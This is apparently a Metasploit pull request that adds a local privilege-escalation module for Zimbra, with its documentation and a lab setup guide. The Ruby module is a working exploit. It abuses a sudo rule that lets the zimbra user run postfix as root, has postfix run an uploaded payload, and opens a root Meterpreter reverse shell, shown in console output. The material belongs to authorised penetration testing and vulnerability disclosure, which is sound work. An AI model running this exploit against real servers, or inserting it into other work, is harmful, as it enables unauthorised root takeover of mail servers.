### PR TITLE
Check in zimbra_postfix_priv_esc.rb

### DIFF
--- a/documentation/modules/exploit/linux/local/zimbra_postfix_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/zimbra_postfix_priv_esc.md
@@ -1,0 +1,57 @@
+## Vulnerable Application
+
+Currently, as of 2022-10-14, all versions of Zimbra are vulnerable. Presumably
+they'll patch it eventually - I reported it to Zimbra.
+
+## Verification Steps
+
+Install Zimbra on any supported Linux version and get a session as the `zimbra`
+user. I used `exploit/linux/http/zimbra_cpio_cve_2022_41352` to get a shell
+on Oracle Linux 8 - you only need to `rm $(which pax)` you can make a fully
+patched host vulnerable, so it's a nice way to test.
+
+You can obviously get a shell however you like. :)
+
+Then:
+
+```
+msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information                Connection
+  --  ----  ----                   -----------                ----------
+  1         meterpreter x64/linux  zimbra @ mail.example.org  172.16.166.147:4444 -> 172.16.166.157:47210 (172.16.166.157)
+
+msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > use exploit/linux/local/zimbra_postfix_priv_esc
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/local/zimbra_postfix_priv_esc) > set SESSION 1
+SESSION => 1
+msf6 exploit(linux/local/zimbra_postfix_priv_esc) > exploit
+
+[*] Started reverse TCP handler on 172.16.166.147:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Sending stage (3045348 bytes) to 172.16.166.157
+[*] Executing: sudo -n -l
+[+] The target appears to be vulnerable.
+[*] Creating exploit directory: /tmp/.GPjXSraCDY
+[*] Writing '/tmp/.GPjXSraCDY/.qjSY8' (250 bytes) ...
+[*] Attempting to trigger payload: sudo /opt/zimbra/common/sbin/postfix -D -v /tmp/.GPjXSraCDY/.qjSY8
+[*] Sending stage (3045348 bytes) to 172.16.166.157
+[+] Deleted /tmp/.GPjXSraCDY
+[*] Meterpreter session 5 opened (172.16.166.147:4444 -> 172.16.166.157:36488) at 2022-10-14 13:19:25 -0700
+
+meterpreter > getuid
+Server username: root
+```
+
+## Options
+
+### SUDO_PATH
+
+The path to `sudo` on the host. If we have a proper environment with `$PATH` set, which we generally do, simply `sudo` is fine.
+
+### ZIMBRA_BASE
+
+The base where Zimbra is installed. Zimbra typically installs to `/opt/zimbra`, and I'm not even sure if it _can_ install elsewhere, so this default should be fine.

--- a/documentation/modules/exploit/linux/local/zimbra_postfix_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/zimbra_postfix_priv_esc.md
@@ -3,13 +3,9 @@
 Currently, as of 2022-10-14, all versions of Zimbra are vulnerable. Presumably
 they'll patch it eventually - I reported it to Zimbra.
 
-## Verification Steps
-
 ### Install Zimbra
 
 My steps to install Zimbra (adapted from Christophe):
-
---
 
 Create a VM with the following specs:
 
@@ -18,7 +14,8 @@ HDD = 128gb
 Memory/etc don't matter
 ```
 
-Install a local DNS server (note: replace `<ip>` with the host's actual ip) (other note: replace `apt` with `yum` to do this on a Red Hat-derived system):
+Install a local DNS server (note: replace `<ip>` with the host's actual ip)
+(other note: replace `apt` with `yum` to do this on a Red Hat-derived system):
 
 ```
 sudo apt update && sudo apt install dnsmasq
@@ -37,7 +34,9 @@ sudo systemctl restart dnsmasq
 echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
 ```
 
-Download Zimbra from https://www.zimbra.com/downloads/zimbra-collaboration-open-source/ - you'll have to sell your soul and opt-in to spam, but they don't validate your email.
+Download Zimbra from
+https://www.zimbra.com/downloads/zimbra-collaboration-open-source/ - you'll
+have to sell your soul and opt-in to spam, but they don't validate your email.
 
 ```
 tar -xvvzf zcs-*.tgz
@@ -50,34 +49,37 @@ sudo ./install.sh
 * Setup the admin password, probably turn off auto-updates
 ```
 
-### Exploit
+## Verification Steps
 
 Get a Meterpreter session on the Zimbra server as the `zimbra` user - I used
 `exploit/linux/http/zimbra_cpio_cve_2022_41352` but just running a Meterpreter
 binary is also fine. To become vulnerable to cve-2022-41352, just `rm $(which pax)`
 then reboot.
 
-From there, 
+From there,
 
 You can obviously get a shell however you like. :)
 
 Then:
 
-* [] use exploit/linux/local/zimbra_postfix_priv_esc
-* [] set SESSION 1
-* [] set RHOSTS <target>
-* [] set LHOST <listenerip>
-* [] exploit
+1. Do: `use exploit/linux/local/zimbra_postfix_priv_esc`
+1. Do: `set SESSION 1`
+1. Do: `set RHOSTS <target>`
+1. Do: `set LHOST <listenerip>`
+1. Do: `exploit`
 
 ## Options
 
 ### SUDO_PATH
 
-The path to `sudo` on the host. If we have a proper environment with `$PATH` set, which we generally do, simply `sudo` is fine.
+The path to `sudo` on the host. If we have a proper environment with `$PATH`
+set, which we generally do, simply `sudo` is fine.
 
 ### ZIMBRA_BASE
 
-The base where Zimbra is installed. Zimbra typically installs to `/opt/zimbra`, and I'm not even sure if it _can_ install elsewhere, so this default should be fine.
+The base where Zimbra is installed. Zimbra typically installs to `/opt/zimbra`,
+and I'm not even sure if it _can_ install elsewhere, so this default should be
+fine.
 
 ### WritableDir
 
@@ -85,7 +87,8 @@ A directory where we can write the payload - by default, `/tmp`.
 
 ### PayloadFilename
 
-A specific filename to use as the payload, within `WritableDir`. By default, it's randomized (with a `.` in front)
+A specific filename to use as the payload, within `WritableDir`. By default,
+it's randomized (with a `.` in front)
 
 ## Scenarios
 

--- a/documentation/modules/exploit/linux/local/zimbra_postfix_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/zimbra_postfix_priv_esc.md
@@ -5,14 +5,91 @@ they'll patch it eventually - I reported it to Zimbra.
 
 ## Verification Steps
 
-Install Zimbra on any supported Linux version and get a session as the `zimbra`
-user. I used `exploit/linux/http/zimbra_cpio_cve_2022_41352` to get a shell
-on Oracle Linux 8 - you only need to `rm $(which pax)` you can make a fully
-patched host vulnerable, so it's a nice way to test.
+### Install Zimbra
+
+My steps to install Zimbra (adapted from Christophe):
+
+--
+
+Create a VM with the following specs:
+
+```
+HDD = 128gb
+Memory/etc don't matter
+```
+
+Install a local DNS server (note: replace `<ip>` with the host's actual ip) (other note: replace `apt` with `yum` to do this on a Red Hat-derived system):
+
+```
+sudo apt update && sudo apt install dnsmasq
+sudo hostnamectl set-hostname mail.example.org
+echo "<ip> mail.example.org" | sudo tee -a /etc/hosts
+echo -e 'listen-address=127.0.0.1\nserver=8.8.8.8\ndomain=example.org\nmx-host=example.org, mail.example.org, 5\nmx-host=mail.example.org, mail.example.org, 5' | sudo tee /etc/dnsmasq.conf
+```
+
+Configure the host to use it:
+
+```
+sudo systemctl disable systemd-resolved
+sudo systemctl stop systemd-resolved
+sudo killall dnsmasq # Seems to be required for Red Hat OSes
+sudo systemctl restart dnsmasq
+echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
+```
+
+Download Zimbra from https://www.zimbra.com/downloads/zimbra-collaboration-open-source/ - you'll have to sell your soul and opt-in to spam, but they don't validate your email.
+
+```
+tar -xvvzf zcs-*.tgz
+cd zcs*
+sudo ./install.sh
+
+* Lots of <enter>
+* DO NOT install `dnscache` module (respond `N` when it ask), I had conflict issues with the local `dnsmasq`
+* Yes change the system
+* Setup the admin password, probably turn off auto-updates
+```
+
+### Exploit
+
+Get a Meterpreter session on the Zimbra server as the `zimbra` user - I used
+`exploit/linux/http/zimbra_cpio_cve_2022_41352` but just running a Meterpreter
+binary is also fine. To become vulnerable to cve-2022-41352, just `rm $(which pax)`
+then reboot.
+
+From there, 
 
 You can obviously get a shell however you like. :)
 
 Then:
+
+* [] use exploit/linux/local/zimbra_postfix_priv_esc
+* [] set SESSION 1
+* [] set RHOSTS <target>
+* [] set LHOST <listenerip>
+* [] exploit
+
+## Options
+
+### SUDO_PATH
+
+The path to `sudo` on the host. If we have a proper environment with `$PATH` set, which we generally do, simply `sudo` is fine.
+
+### ZIMBRA_BASE
+
+The base where Zimbra is installed. Zimbra typically installs to `/opt/zimbra`, and I'm not even sure if it _can_ install elsewhere, so this default should be fine.
+
+### WritableDir
+
+A directory where we can write the payload - by default, `/tmp`.
+
+### PayloadFilename
+
+A specific filename to use as the payload, within `WritableDir`. By default, it's randomized (with a `.` in front)
+
+## Scenarios
+
+### Escalating a `zimbra` session to `root`, after exploiting cve-2022-41352
 
 ```
 msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > sessions -l
@@ -45,13 +122,3 @@ msf6 exploit(linux/local/zimbra_postfix_priv_esc) > exploit
 meterpreter > getuid
 Server username: root
 ```
-
-## Options
-
-### SUDO_PATH
-
-The path to `sudo` on the host. If we have a proper environment with `$PATH` set, which we generally do, simply `sudo` is fine.
-
-### ZIMBRA_BASE
-
-The base where Zimbra is installed. Zimbra typically installs to `/opt/zimbra`, and I'm not even sure if it _can_ install elsewhere, so this default should be fine.

--- a/modules/exploits/linux/local/zimbra_postfix_priv_esc.rb
+++ b/modules/exploits/linux/local/zimbra_postfix_priv_esc.rb
@@ -1,0 +1,127 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Compile
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Zimbra sudo + postfix privilege escalation',
+        'Description' => %q{
+          This module exploits a vulnerable sudo configuration that permits the
+          zimbra user to execute postfix as root. In turn, postfix can execute
+          arbitrary shellscripts, which means it can execute a root shell.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'EvergreenCartoons', # discovery and poc
+          'Ron Bowes',         # Module
+        ],
+        'DisclosureDate' => '2022-10-13',
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Privileged' => true,
+        'References' => [
+          [ 'URL', 'https://twitter.com/ldsopreload/status/1580539318879547392' ],
+        ],
+        'Targets' => [
+          [ 'Auto', {} ],
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        }
+      )
+    )
+    register_options [
+      OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]),
+      OptString.new('ZIMBRA_BASE', [ true, "Zimbra's installation directory", '/opt/zimbra' ]),
+    ]
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  # Because this isn't patched, I can't say with 100% certainty that this will
+  # detect a future patch (it depends on how they patch it)
+  def check
+    # Sanity check
+    if is_root?
+      fail_with(Failure::None, 'Session already has root privileges')
+    end
+
+    unless file_exist?("#{datastore['ZIMBRA_BASE']}/common/sbin/postfix")
+      print_error("postfix executable not detected: #{datastore['ZIMBRA_BASE']}/common/sbin/postfix (set ZIMBRA_BASE if Zimbra is installed in an unusual location)")
+      return CheckCode::Safe
+    end
+
+    unless command_exists?(datastore['SUDO_PATH'])
+      print_error("Could not find sudo: #{datastore['SUDOPATH']} (set SUDO_PATH if sudo isn't in $PATH)")
+      return CheckCode::Safe
+    end
+
+    # Run `sudo -n -l` to make sure we have access to the target command
+    cmd = "#{datastore['SUDO_PATH']} -n -l"
+    print_status "Executing: #{cmd}"
+    output = cmd_exec(cmd).to_s
+
+    if !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required')
+      print_error('Current user could not execute sudo -l')
+      return CheckCode::Safe
+    end
+
+    if !output.include?("(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/common/sbin/postfix")
+      print_error('Current user does not have access to run postfix')
+      return CheckCode::Safe
+    end
+
+    CheckCode::Appears
+  end
+
+  def exploit
+    base_dir = datastore['WritableDir'].to_s
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end
+
+    # Generate a random directory
+    exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    if file_exist?(exploit_dir)
+      fail_with(Failure::BadConfig, 'Exploit dir already exists')
+    end
+
+    # Create the directory and get ready to remove it
+    print_status("Creating exploit directory: #{exploit_dir}")
+    mkdir(exploit_dir)
+    register_dir_for_cleanup(exploit_dir)
+
+    # Generate some filenames
+    payload_filename = ".#{rand_text_alphanumeric(5..10)}"
+    payload_path = "#{exploit_dir}/#{payload_filename}"
+    upload_and_chmodx(payload_path, generate_payload_exe)
+
+    cmd = "sudo #{datastore['ZIMBRA_BASE']}/common/sbin/postfix -D -v #{payload_path}"
+    print_status "Attempting to trigger payload: #{cmd}"
+    out = cmd_exec(cmd)
+
+    unless session_created?
+      print_error("Failed to create session! Cmd output = #{out}")
+    end
+  end
+end

--- a/modules/exploits/linux/local/zimbra_postfix_priv_esc.rb
+++ b/modules/exploits/linux/local/zimbra_postfix_priv_esc.rb
@@ -8,9 +8,6 @@ class MetasploitModule < Msf::Exploit::Local
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Post::Linux::Priv
-  include Msf::Post::Linux::System
-  include Msf::Post::Linux::Compile
-  include Msf::Post::Linux::Kernel
   include Msf::Post::File
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
@@ -36,6 +33,7 @@ class MetasploitModule < Msf::Exploit::Local
         'SessionTypes' => [ 'shell', 'meterpreter' ],
         'Privileged' => true,
         'References' => [
+          [ 'CVE', '2022-3569' ],
           [ 'URL', 'https://twitter.com/ldsopreload/status/1580539318879547392' ],
         ],
         'Targets' => [
@@ -54,7 +52,8 @@ class MetasploitModule < Msf::Exploit::Local
       OptString.new('ZIMBRA_BASE', [ true, "Zimbra's installation directory", '/opt/zimbra' ]),
     ]
     register_advanced_options [
-      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+      OptString.new('PayloadFilename', [ false, 'The name to use for the executable (default: ".<random>"' ])
     ]
   end
 
@@ -100,21 +99,10 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::BadConfig, "#{base_dir} is not writable")
     end
 
-    # Generate a random directory
-    exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
-    if file_exist?(exploit_dir)
-      fail_with(Failure::BadConfig, 'Exploit dir already exists')
-    end
-
-    # Create the directory and get ready to remove it
-    print_status("Creating exploit directory: #{exploit_dir}")
-    mkdir(exploit_dir)
-    register_dir_for_cleanup(exploit_dir)
-
     # Generate some filenames
-    payload_filename = ".#{rand_text_alphanumeric(5..10)}"
-    payload_path = "#{exploit_dir}/#{payload_filename}"
+    payload_path = File.join(base_dir, datastore['PayloadFilename'] || ".#{rand_text_alphanumeric(5..10)}")
     upload_and_chmodx(payload_path, generate_payload_exe)
+    register_file_for_cleanup(payload_path)
 
     cmd = "sudo #{datastore['ZIMBRA_BASE']}/common/sbin/postfix -D -v #{payload_path}"
     print_status "Attempting to trigger payload: #{cmd}"


### PR DESCRIPTION
## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Get a session as the `zimbra` user somehow (I used `exploit/linux/http/zimbra_cpio_cve_2022_41352`, which isn't merged yet, but any way to get a shell is fine)
- [ ] `use exploit/linux/local/zimbra_postfix_priv_esc`
- [ ] `set SESSION <session>`
- [ ] `exploit`
- [ ] Should give you root!

```
msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                Connection
  --  ----  ----                   -----------                ----------
  1         meterpreter x64/linux  zimbra @ mail.example.org  172.16.166.147:4444 -> 172.16.166.157:47210 (172.16.166.157)

msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > use exploit/linux/local/zimbra_postfix_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/zimbra_postfix_priv_esc) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/zimbra_postfix_priv_esc) > exploit

[*] Started reverse TCP handler on 172.16.166.147:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Sending stage (3045348 bytes) to 172.16.166.157
[*] Executing: sudo -n -l
[+] The target appears to be vulnerable.
[*] Creating exploit directory: /tmp/.GPjXSraCDY
[*] Writing '/tmp/.GPjXSraCDY/.qjSY8' (250 bytes) ...
[*] Attempting to trigger payload: sudo /opt/zimbra/common/sbin/postfix -D -v /tmp/.GPjXSraCDY/.qjSY8
[*] Sending stage (3045348 bytes) to 172.16.166.157
[+] Deleted /tmp/.GPjXSraCDY
[*] Meterpreter session 5 opened (172.16.166.147:4444 -> 172.16.166.157:36488) at 2022-10-14 13:19:25 -0700

meterpreter > getuid
Server username: root
```

## Instructions for installing Zimbra

(Adapted from @cdelafuente-r7's original install way back like two months ago)

Create a VM

```
HDD = 128gb
Memory/etc don't matter
```

I installed a local DNS server (note: replace `<ip>` with the host's actual ip) (other note: replace `apt` with `yum` to do this on a Red Hat-derived system):

```
sudo apt update && sudo apt install dnsmasq
sudo hostnamectl set-hostname mail.example.org
echo "<ip> mail.example.org" | sudo tee -a /etc/hosts
echo -e 'listen-address=127.0.0.1\nserver=8.8.8.8\ndomain=example.org\nmx-host=example.org, mail.example.org, 5\nmx-host=mail.example.org, mail.example.org, 5' | sudo tee /etc/dnsmasq.conf
```

Configure the host to use it:

```
sudo systemctl disable systemd-resolved
sudo systemctl stop systemd-resolved
sudo killall dnsmasq
sudo systemctl restart dnsmasq
echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
```

Download Zimbra from https://www.zimbra.com/downloads/zimbra-collaboration-open-source/ - you'll have to sell your soul and opt-in to spam, but they don't validate your email.

```
tar -xvvzf zcs-*.tgz
cd zcs*
sudo ./install.sh

* Lots of <enter>
* DO NOT install `dnscache` module (respond `N` when it ask), I had conflict issues with the local `dnsmasq`
* Yes change the system
* Setup the admin password, probably turn off auto-updates
```
